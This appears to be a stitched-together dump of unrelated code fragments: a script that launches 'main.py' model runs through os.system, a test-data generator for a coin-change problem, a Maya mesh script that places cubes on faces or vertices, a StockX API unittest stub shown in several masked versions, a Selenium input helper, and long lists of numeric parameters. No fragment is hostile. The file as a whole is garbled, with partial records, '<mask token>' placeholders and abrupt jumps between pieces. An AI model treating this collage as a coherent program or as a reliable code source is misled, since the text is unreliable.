"step-2": "<mask token>\n\n\ndef run(name, dim_k, dump='dump', add_cmd=''):\n res = all_res[name]\n model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'\n cmd = (\n f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'\n )\n print(cmd)\n ret = os.system(cmd)\n if ret != 0:\n input('Error!!!!!!')\n\n\n<mask token>\n\n\ndef main():\n run('id_att_3', 1024, dump='dump')\n run('id_last', 1024, dump='dump')\n run('c_att_5', 256, dump='dump', add_cmd='-seq_length=5')\n run('c_last', 256, dump='dump')\n run('id_att_3', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('id_last', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('c_att_5', 256, dump='dump_all', add_cmd='-skip_vali -seq_length=5')\n run('c_last', 256, dump='dump_all', add_cmd='-skip_vali')\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\n\n\ndef run(name, dim_k, dump='dump', add_cmd=''):\n res = all_res[name]\n model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'\n cmd = (\n f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'\n )\n print(cmd)\n ret = os.system(cmd)\n if ret != 0:\n input('Error!!!!!!')\n\n\nall_res = dict(id_att_3='id_att_3', id_last='id_last', c_att_5='c_att_5',\n c_last='c_last')\n\n\ndef main():\n run('id_att_3', 1024, dump='dump')\n run('id_last', 1024, dump='dump')\n run('c_att_5', 256, dump='dump', add_cmd='-seq_length=5')\n run('c_last', 256, dump='dump')\n run('id_att_3', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('id_last', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('c_att_5', 256, dump='dump_all', add_cmd='-skip_vali -seq_length=5')\n run('c_last', 256, dump='dump_all', add_cmd='-skip_vali')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\nimport os\nimport utils\n\n\ndef run(name, dim_k, dump='dump', add_cmd=''):\n res = all_res[name]\n model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'\n cmd = (\n f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'\n )\n print(cmd)\n ret = os.system(cmd)\n if ret != 0:\n input('Error!!!!!!')\n\n\nall_res = dict(id_att_3='id_att_3', id_last='id_last', c_att_5='c_att_5',\n c_last='c_last')\n\n\ndef main():\n run('id_att_3', 1024, dump='dump')\n run('id_last', 1024, dump='dump')\n run('c_att_5', 256, dump='dump', add_cmd='-seq_length=5')\n run('c_last', 256, dump='dump')\n run('id_att_3', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('id_last', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('c_att_5', 256, dump='dump_all', add_cmd='-skip_vali -seq_length=5')\n run('c_last', 256, dump='dump_all', add_cmd='-skip_vali')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import sys\nimport os\nimport utils\n\ndef run(name, dim_k, dump='dump', add_cmd=''):\n res = all_res[name]\n model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'\n\n cmd = f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'\n print(cmd)\n\n ret = os.system(cmd)\n if ret != 0:\n input('Error!!!!!!')\n\nall_res = dict(\n id_att_3='id_att_3',\n id_last='id_last',\n\n c_att_5='c_att_5',\n c_last='c_last',\n)\n\n\ndef main():\n run('id_att_3', 1024, dump='dump')\n run('id_last', 1024, dump='dump')\n run('c_att_5', 256, dump='dump', add_cmd='-seq_length=5')\n run('c_last', 256, dump='dump')\n\n run('id_att_3', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('id_last', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('c_att_5', 256, dump='dump_all', add_cmd='-skip_vali -seq_length=5')\n run('c_last', 256, dump='dump_all', add_cmd='-skip_vali')\n\n\n\nif __name__ == '__main__':\n main()",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
"""
get poly data(face center, face id, etc), select face, create object by face data
setPosition for vertex (random)
import sys
module_path = '/home/shrimo/Desktop/course/git/vfx_dev/maya/general_lesson'
if module_path not in sys.path:
sys.path.append(module_path)
import lesson_v01
reload(lesson_v01)
lesson_v01.start()
"""
import maya.cmds as cmds
import maya.api.OpenMaya as om2
import random
class Face():
def __init__(self, shape, face_index, vertex, center):
self.face_path = '{shape}.f[{index}]'.format(
shape=shape,
index=face_index)
self.vertex = vertex
self.face_index = face_index
self.face_center = center
def get_shapes():
# get selected object
# print(cmds.ls())
# print(cmds.ls(selection=True))
return cmds.ls(selection=True, shapes=True, dagObjects=True)
def get_faces(shapes):
# cmds.select(clear=True)
# print(shapes)
face_data = []
for shape in shapes:
mSel = om2.MSelectionList()
mSel.add(shape)
mDagPath, mObj = mSel.getComponent(0)
geo = om2.MItMeshPolygon(mDagPath, mObj)
while not geo.isDone():
center = geo.center()
print 'face index: {}'.format(geo.index())
vertices = []
for i in geo.getPoints(om2.MSpace.kWorld):
vertices.append((i[0], i[1], i[2]))
face_in = Face(shape, geo.index(), vertices, center)
face_data.append(face_in)
geo.next(0)
return face_data
def get_vertex(shapes):
vertex_data = []
spc = om2.MSpace.kWorld
for shape in shapes:
mSel = om2.MSelectionList()
mSel.add(shape)
mDagPath, mObj = mSel.getComponent(0)
vtx = om2.MItMeshVertex(mDagPath, mObj)
while not vtx.isDone():
vtx_pos = vtx.position(spc)
print 'vertex index: {}'.format(vtx.index()), vtx_pos
face_in = Face(shape, vtx.index(), vtx_pos, None)
vertex_data.append(face_in)
vtx.next()
return vertex_data
def set_pos_vertex(shapes, up_y):
spc = om2.MSpace.kWorld
for shape in shapes:
mSel = om2.MSelectionList()
mSel.add(shape)
mDagPath, mObj = mSel.getComponent(0)
vtx = om2.MItMeshVertex(mDagPath, mObj)
while not vtx.isDone():
vtx_pos = vtx.position(spc)
print 'vertex:'+str(vtx.index()), vtx_pos.y
if vtx.index() & 1:
vtx_pos.y += up_y
vtx.setPosition(vtx_pos, spc)
vtx.next()
vtx.updateSurface()
def set_random_vertex(shapes, up_y):
spc = om2.MSpace.kWorld
for shape in shapes:
mSel = om2.MSelectionList()
mSel.add(shape)
mDagPath, mObj = mSel.getComponent(0)
vtx = om2.MItMeshVertex(mDagPath, mObj)
while not vtx.isDone():
vtx_pos = vtx.position(spc)
print 'vertex:'+str(vtx.index()), vtx_pos.y
vtx_pos.z += random.uniform(0, up_y)
vtx.setPosition(vtx_pos, spc)
vtx.next()
vtx.updateSurface()
def create_boxes(shapes, group_name, shape_name, on_face):
if on_face:
face_data = get_faces(shapes)
else:
face_data = get_vertex(shapes)
cmds.group(em=True, name=group_name)
for face in face_data:
# print(face.face_index, face.face_path, face.face_center)
if face.face_index & 1:
cmds.select(face.face_path, add=True)
p_name = shape_name + str(face.face_index)
cmds.polyCube(n=p_name) # create polyCube name by p_ + face index
cmds.setAttr(p_name+'.scale', 0.3, 0.3, 0.3)
if on_face:
cmds.setAttr(
p_name+'.translate', face.face_center[0], face.face_center[1], face.face_center[2])
else:
cmds.setAttr(p_name+'.translate', face.vertex.x,
face.vertex.y, face.vertex.z)
cmds.select(all=True)
cmds.parent(p_name, group_name)
# cmds.group(p_name, parent=group_name)
cmds.select(all=True)
def start():
# shapes = cmds.ls(selection=True, shapes=True, dagObjects=True)
# set_pos_vertex(get_shapes(), 1)
# set_random_vertex(get_shapes(), 1)
create_boxes(get_shapes(), 'boxes', 'v_', 0)
|
normal
|
{
"blob_id": "723d8819b5341f1397163533f59c17ba1a74b77d",
"index": 1310,
"step-1": "\"\"\"\nget poly data(face center, face id, etc), select face, create object by face data\nsetPosition for vertex (random)\n\nimport sys\nmodule_path = '/home/shrimo/Desktop/course/git/vfx_dev/maya/general_lesson'\nif module_path not in sys.path:\n sys.path.append(module_path)\n \n\nimport lesson_v01\nreload(lesson_v01)\nlesson_v01.start()\n\"\"\"\n\n\nimport maya.cmds as cmds\nimport maya.api.OpenMaya as om2\nimport random\n\n\nclass Face():\n def __init__(self, shape, face_index, vertex, center):\n self.face_path = '{shape}.f[{index}]'.format(\n shape=shape,\n index=face_index)\n self.vertex = vertex\n self.face_index = face_index\n self.face_center = center\n\n\ndef get_shapes():\n # get selected object\n # print(cmds.ls())\n # print(cmds.ls(selection=True))\n return cmds.ls(selection=True, shapes=True, dagObjects=True)\n\n\ndef get_faces(shapes):\n # cmds.select(clear=True)\n # print(shapes)\n face_data = []\n for shape in shapes:\n mSel = om2.MSelectionList()\n mSel.add(shape)\n mDagPath, mObj = mSel.getComponent(0)\n geo = om2.MItMeshPolygon(mDagPath, mObj)\n while not geo.isDone():\n center = geo.center()\n print 'face index: {}'.format(geo.index())\n vertices = []\n for i in geo.getPoints(om2.MSpace.kWorld):\n vertices.append((i[0], i[1], i[2]))\n face_in = Face(shape, geo.index(), vertices, center)\n face_data.append(face_in)\n geo.next(0)\n\n return face_data\n\n\ndef get_vertex(shapes):\n vertex_data = []\n spc = om2.MSpace.kWorld\n for shape in shapes:\n mSel = om2.MSelectionList()\n mSel.add(shape)\n mDagPath, mObj = mSel.getComponent(0)\n vtx = om2.MItMeshVertex(mDagPath, mObj)\n while not vtx.isDone():\n vtx_pos = vtx.position(spc)\n print 'vertex index: {}'.format(vtx.index()), vtx_pos\n face_in = Face(shape, vtx.index(), vtx_pos, None)\n vertex_data.append(face_in)\n vtx.next()\n\n return vertex_data\n\n\ndef set_pos_vertex(shapes, up_y):\n spc = om2.MSpace.kWorld\n for shape in shapes:\n mSel = om2.MSelectionList()\n mSel.add(shape)\n mDagPath, mObj = mSel.getComponent(0)\n vtx = om2.MItMeshVertex(mDagPath, mObj)\n while not vtx.isDone():\n vtx_pos = vtx.position(spc)\n print 'vertex:'+str(vtx.index()), vtx_pos.y\n if vtx.index() & 1:\n vtx_pos.y += up_y\n vtx.setPosition(vtx_pos, spc)\n vtx.next()\n\n vtx.updateSurface()\n\n\ndef set_random_vertex(shapes, up_y):\n spc = om2.MSpace.kWorld\n for shape in shapes:\n mSel = om2.MSelectionList()\n mSel.add(shape)\n mDagPath, mObj = mSel.getComponent(0)\n vtx = om2.MItMeshVertex(mDagPath, mObj)\n while not vtx.isDone():\n vtx_pos = vtx.position(spc)\n print 'vertex:'+str(vtx.index()), vtx_pos.y\n vtx_pos.z += random.uniform(0, up_y)\n vtx.setPosition(vtx_pos, spc)\n vtx.next()\n\n vtx.updateSurface()\n\n\ndef create_boxes(shapes, group_name, shape_name, on_face):\n if on_face:\n face_data = get_faces(shapes)\n else:\n face_data = get_vertex(shapes)\n cmds.group(em=True, name=group_name)\n for face in face_data:\n # print(face.face_index, face.face_path, face.face_center)\n if face.face_index & 1:\n cmds.select(face.face_path, add=True)\n p_name = shape_name + str(face.face_index)\n cmds.polyCube(n=p_name) # create polyCube name by p_ + face index\n cmds.setAttr(p_name+'.scale', 0.3, 0.3, 0.3)\n if on_face:\n cmds.setAttr(\n p_name+'.translate', face.face_center[0], face.face_center[1], face.face_center[2])\n else:\n cmds.setAttr(p_name+'.translate', face.vertex.x,\n face.vertex.y, face.vertex.z)\n cmds.select(all=True)\n cmds.parent(p_name, group_name) \n # cmds.group(p_name, parent=group_name)\n cmds.select(all=True)\n\n\ndef start():\n # shapes = cmds.ls(selection=True, shapes=True, dagObjects=True)\n # set_pos_vertex(get_shapes(), 1)\n # set_random_vertex(get_shapes(), 1)\n create_boxes(get_shapes(), 'boxes', 'v_', 0)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):
<|reserved_special_token_0|>
def setUp(self):
pass
def tearDown(self):
pass
def testPortfolioIdDelResponsePortfolioItemProductMedia(self):
"""Test PortfolioIdDelResponsePortfolioItemProductMedia"""
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):
"""PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testPortfolioIdDelResponsePortfolioItemProductMedia(self):
"""Test PortfolioIdDelResponsePortfolioItemProductMedia"""
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):
"""PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testPortfolioIdDelResponsePortfolioItemProductMedia(self):
"""Test PortfolioIdDelResponsePortfolioItemProductMedia"""
pass
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from __future__ import absolute_import
import unittest
import io_stockx
from io_stockx.models.portfolio_id_del_response_portfolio_item_product_media import PortfolioIdDelResponsePortfolioItemProductMedia
from io_stockx.rest import ApiException
class TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):
"""PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testPortfolioIdDelResponsePortfolioItemProductMedia(self):
"""Test PortfolioIdDelResponsePortfolioItemProductMedia"""
pass
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
# coding: utf-8
"""
StockX API
PRERELEASE API - Subject to change before release. Provides access to StockX's public services, allowing end users to query for product and order information. # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import io_stockx
from io_stockx.models.portfolio_id_del_response_portfolio_item_product_media import PortfolioIdDelResponsePortfolioItemProductMedia # noqa: E501
from io_stockx.rest import ApiException
class TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):
"""PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testPortfolioIdDelResponsePortfolioItemProductMedia(self):
"""Test PortfolioIdDelResponsePortfolioItemProductMedia"""
# FIXME: construct object with mandatory attributes with example values
# model = io_stockx.models.portfolio_id_del_response_portfolio_item_product_media.PortfolioIdDelResponsePortfolioItemProductMedia() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "ae88418ccfdaa4b357a2491f6450dbcda55b1c21",
"index": 2013,
"step-1": "<mask token>\n\n\nclass TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testPortfolioIdDelResponsePortfolioItemProductMedia(self):\n \"\"\"Test PortfolioIdDelResponsePortfolioItemProductMedia\"\"\"\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):\n \"\"\"PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testPortfolioIdDelResponsePortfolioItemProductMedia(self):\n \"\"\"Test PortfolioIdDelResponsePortfolioItemProductMedia\"\"\"\n pass\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):\n \"\"\"PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testPortfolioIdDelResponsePortfolioItemProductMedia(self):\n \"\"\"Test PortfolioIdDelResponsePortfolioItemProductMedia\"\"\"\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nfrom __future__ import absolute_import\nimport unittest\nimport io_stockx\nfrom io_stockx.models.portfolio_id_del_response_portfolio_item_product_media import PortfolioIdDelResponsePortfolioItemProductMedia\nfrom io_stockx.rest import ApiException\n\n\nclass TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):\n \"\"\"PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testPortfolioIdDelResponsePortfolioItemProductMedia(self):\n \"\"\"Test PortfolioIdDelResponsePortfolioItemProductMedia\"\"\"\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "# coding: utf-8\n\n\"\"\"\n StockX API\n\n PRERELEASE API - Subject to change before release. Provides access to StockX's public services, allowing end users to query for product and order information. # noqa: E501\n\n OpenAPI spec version: 1.0.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport io_stockx\nfrom io_stockx.models.portfolio_id_del_response_portfolio_item_product_media import PortfolioIdDelResponsePortfolioItemProductMedia # noqa: E501\nfrom io_stockx.rest import ApiException\n\n\nclass TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):\n \"\"\"PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testPortfolioIdDelResponsePortfolioItemProductMedia(self):\n \"\"\"Test PortfolioIdDelResponsePortfolioItemProductMedia\"\"\"\n # FIXME: construct object with mandatory attributes with example values\n # model = io_stockx.models.portfolio_id_del_response_portfolio_item_product_media.PortfolioIdDelResponsePortfolioItemProductMedia() # noqa: E501\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# -*- coding: utf-8 -*-
from selenium.webdriver.common.keys import Keys
from titan.components import Base
class Input(Base):
def clear(self):
element = self.driver.find_element_by_xpath(self.params['xpath'])
if self.params.get('clear', None):
element.clear()
return True
element.click()
space_num = self.params['space']if self.params.get('space', None) else 4
while space_num:
space_num -= 1
element.send_keys(Keys.BACK_SPACE)
def text(self):
print(self.params)
element = self.driver.find_element_by_xpath(self.params['xpath'])
element.send_keys(self.params['text'])
|
normal
|
{
"blob_id": "7503a0c8f83ff0ce370ed7bce733b09d9a2c69c4",
"index": 817,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n element.click()\n space_num = self.params['space'] if self.params.get('space', None\n ) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n element.click()\n space_num = self.params['space'] if self.params.get('space', None\n ) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n\n def text(self):\n print(self.params)\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n element.send_keys(self.params['text'])\n",
"step-4": "from selenium.webdriver.common.keys import Keys\nfrom titan.components import Base\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n element.click()\n space_num = self.params['space'] if self.params.get('space', None\n ) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n\n def text(self):\n print(self.params)\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n element.send_keys(self.params['text'])\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom selenium.webdriver.common.keys import Keys\nfrom titan.components import Base\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n\n element.click()\n space_num = self.params['space']if self.params.get('space', None) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n\n def text(self):\n print(self.params)\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n element.send_keys(self.params['text'])\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#!/usr/bin/python
from random import *
prob = "change"
cases = [
10,
10,
10,
100,
100,
100000,
100000,
100000,
100000,
100000
]
cur = 0
st = [1,2,5,10,20,50,100,200,500,1000,2000,5000,10000]
for (n) in cases :
cout = ""
cur += 1
print "make %d..." % cur
##-----
#TODO generate the data
tot = 0
stt = []
for a in st :
for b in st :
if b < a and a <= n :
tot = tot + 1
stt.append( (a,b) )
cout += "%d\n" % tot
for (a,b) in stt :
cout += "%d %d\n" % (a, b)
##-----
f = file( prob + str(cur) + ".in", "w" )
f.write( cout )
f.close()
|
normal
|
{
"blob_id": "2cef5311a9ff9497ad6611fe7b47e4f7c5b1b3c7",
"index": 7581,
"step-1": "#!/usr/bin/python\n\nfrom random import *\n\nprob = \"change\"\n\ncases = [ \n 10,\n 10,\n 10,\n 100,\n 100,\n 100000,\n 100000,\n 100000,\n 100000,\n 100000\n ]\ncur = 0\n\nst = [1,2,5,10,20,50,100,200,500,1000,2000,5000,10000]\n\nfor (n) in cases :\n cout = \"\"\n cur += 1\n print \"make %d...\" % cur\n##-----\n#TODO generate the data\n\n tot = 0\n stt = []\n for a in st :\n for b in st :\n if b < a and a <= n :\n tot = tot + 1\n stt.append( (a,b) )\n cout += \"%d\\n\" % tot\n for (a,b) in stt :\n cout += \"%d %d\\n\" % (a, b)\n\n\n##-----\n f = file( prob + str(cur) + \".in\", \"w\" )\n f.write( cout )\n f.close()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
one=[7.236287049225701e-06, -1.445911565527231e-12, -1.7498772740084537e-13, 5.109944355076077e-11, -2.5430545472048434e-10, -1.1709514644876058e-15, 3.210132219509301e-16, 2.502027767038304e-05, -1.975229899156637e-06, -1.4769695480936238e-08, 8.945619840357268e-10, 135323228000.64511, 130464457208.5385]
two=[6.101651991514008e-06, -1.2764740103418866e-12, -1.9703439809858206e-13, 4.396430723625485e-11, -7.256876412950873e-11, -1.0739249647595844e-15, 3.658727722774004e-16, 2.9622074287767617e-05, -1.9615179204309246e-06, -1.518516920005905e-08, 8.601004856702239e-10, 194360719320.3122, 75684271432.82758]
three=[6.4442734160126695e-06, -1.2463732938819767e-12, -1.7912928652160854e-13, 3.990379556815055e-11, -7.256876412950873e-11, -1.128505986956859e-15, 3.855466000081844e-16, 2.7105518268805634e-05, -1.918022677712299e-06, -1.648586510957147e-08, 8.952907812465134e-10, 40874176708.45886, 129961018217.7445]
four=[5.591985036569838e-06, -1.5732644861037622e-12, -1.2586540738798186e-13, 5.508993685740796e-11, -2.345347836605763e-10, -2.1583737575101563e-15, 3.315525502908504e-16, 2.240369111953624e-05, -1.8808495402864136e-06, -1.5154818034574072e-08, 9.134128217572173e-10, 95538034865.65512, 192689393537.75766]
five=[5.9877501684316964e-06, -1.4725222964411265e-12, -2.0184675219747084e-13, 4.503520441436847e-11, -2.195719309752964e-10, -1.1996862422718706e-15, 3.172649531291829e-16, 2.235294071412983e-05, -1.7673862518012629e-06, -1.593810591566234e-08, 8.495479067416047e-10, 172629547544.72174, 121012464101.10771]
six = [6.525636151737385e-10, -1.5516831882387681e-12, -1.7065883936338436e-13, 4.6265959327559024e-11, -2.669670220497726e-10, -1.0739249647595844e-15, 9.085513864943156e-16, 2.5963751617497686e-05, -1.9757021060346726e-06, -1.5031696163247858e-08, 8.945619840357268e-10, 99871865434.22476, 123933224114.80229]
first1_gen= [[6.417695307686038e-06, -1.2416886913890308e-12, -1.791907685050265e-13, 3.983180616117193e-11, -7.243488055496258e-11, -1.1211433897576025e-15, 3.855466000081844e-16, 2.7255618460061466e-05, -1.917823676019374e-06, -1.6515339421288782e-08, 9.011563904603084e-10, 37866240406.859344, 251532289608.81], [5.974092884160685e-06, -1.4591405170404072e-12, -2.0184675219747084e-13, 4.3821744446480515e-11, -7.22093644433135e-11, -1.0712173220027044e-15, 3.65758224365464e-16, 2.235294071412983e-05, -1.763797302814154e-06, -1.6059311052756668e-08, 8.601004856702239e-10, 50907349656.8246, 117645129547.73723], [7.171513003462397e-06, -1.4334443716578728e-12, -1.749514610735409e-13, 5.509823004788858e-11, -2.5310572250093563e-10, -1.1729621402736547e-15, 3.321162280251396e-16, 2.4812886502853343e-05, -1.964119169077712e-06, -1.4799846596325615e-08, 8.965548334484032e-10, 85071583311.774, 128667385131.30013], [7.3000149385339486e-06, -1.4508582334938624e-12, -1.7446896418754742e-13, 5.109944355076077e-11, -2.5448794058714256e-10, -1.1658376910672744e-15, 3.1827015830354867e-16, 2.502027767038304e-05, -1.9664311146400523e-06, -1.4730561693079958e-08, 8.945619840357268e-10, 88113858040.47986, 127558862768.52084], [5.581899283069486e-06, -1.5683042319109065e-12, -1.2586540738798186e-13, 5.535493146365402e-11, -2.359264703422783e-10, -2.1583737575101563e-15, 3.2921934547988314e-16, 2.2287538734129395e-05, -1.8740196054647742e-06, -1.5117323048065992e-08, 9.114608510796109e-10, 90926368846.81926, 202187413440.1054], [7.283321725975412e-06, -1.4356567410151954e-12, -1.7340660013452496e-13, 5.090884822547887e-11, -2.5483963758954753e-10, -1.139281753854116e-15, 3.1970242364315826e-16, 2.7105518268805634e-05, -1.963160298901409e-06, -1.4681586301228543e-08, 8.916460477308206e-10, 142505061534.36484, 476063714570.38367], [5.591985036569838e-06, -1.582675728169255e-12, -1.7359285477580936e-13, 5.508993685740796e-11, -2.5320893657294154e-10, -2.1583737575101563e-15, 3.210132219509301e-16, 2.511654073479438e-05, -1.965555797894771e-06, -1.5140087108671845e-08, 9.214909160927855e-10, 154168790181.56195, 151975095946.00134], [6.4442734160126695e-06, -1.5732644861037622e-12, -1.8036634758606428e-13, 5.508993685740796e-11, -7.27534017567909e-11, -2.1583737575101563e-15, 3.306758579127667e-16, 2.2271668826613973e-05, -1.8701423073554431e-06, -1.501078224172373e-08, 8.952907812465134e-10, 267883353895.00665, 158759045786.36343], [6.460391520361948e-06, -1.2647094709156108e-12, -1.7971415732486973e-13, 4.396430723625485e-11, -7.247266456377939e-11, -1.1373744765683215e-15, 3.658727722774004e-16, 2.7105518268805634e-05, -1.9663482803776534e-06, -1.6397993463300374e-08, 8.923803313149724e-10, 349965962553.9084, 297837273933.3269], [5.6272383047081095e-06, -1.5732644861037622e-12, -1.2571170147507106e-13, 5.534697362808701e-11, -2.3610413258218975e-10, -1.1709514644876058e-15, 3.2295817320330796e-16, 2.2314117324425535e-05, -1.8663649176622442e-06, -1.4769695480936238e-08, 9.134128217572173e-10, 393807734620.02893, 1450122303072.2456], [6.437914022666636e-06, -1.2546731037733632e-12, -1.7844406460041829e-13, 5.488975389250315e-11, -7.259445338393382e-11, -2.1597092009682793e-15, 3.3041861616205316e-16, 2.240369111953624e-05, -1.876360375320595e-06, -1.648586510957147e-08, 9.134128217572173e-10, 630890128752.3734, 431834854178.85406], [6.046575120541287e-06, -1.2764740103418866e-12, -1.746683186012092e-13, 5.109944355076077e-11, -2.520608616913497e-10, -1.0704525109919603e-15, 3.6772692838424905e-16, 2.971296945414015e-05, -1.951293357817624e-06, -1.4769695480936238e-08, 8.939102135383639e-10, 871857905030.9667, 2328286443290.7437], [6.051000675950963e-06, -1.2846825520511646e-12, -1.268060597488819e-13, 5.490952472465525e-11, -2.3244121922778247e-10, -2.1424540029363198e-15, 3.673980081076506e-16, 2.961326937497751e-05, -1.895367635724618e-06, -1.5034205062876655e-08, 9.16195585945909e-10, 1374938673042.5493, 4524615824537.332], [5.6149092148265474e-06, -1.4639678768975506e-12, -1.253161090730697e-13, 4.481233479664715e-11, -2.335516269047763e-10, -2.1416544930348844e-15, 3.3108330528832777e-16, 2.22837679272578e-05, -1.8681878215606722e-06, -1.528899727808779e-08, 8.573199342562181e-10, 1914602582873.603, 2013877892656.268], [6.101651991514008e-06, -1.5833077943313046e-12, -1.9703439809858206e-13, 5.500949944067544e-11, -7.256876412950873e-11, -1.0739249647595844e-15, 3.658727722774004e-16, 2.970517711660123e-05, -1.8738366196528042e-06, -1.522166132952199e-08, 9.123763139194573e-10, 3105022967535.493, 7589715261899.736], [7.169307360099383e-06, -1.475336624504327e-12, -2.0167346748799746e-13, 4.53859215469466e-11, -2.1795530264429259e-10, -1.209364174087727e-15, 3.179525403817121e-16, 2.248948490803903e-05, -1.9732992714201345e-06, -1.4769695480936238e-08, 8.472670825115021e-10, 3105580314530.341, 4622017117439.275]]
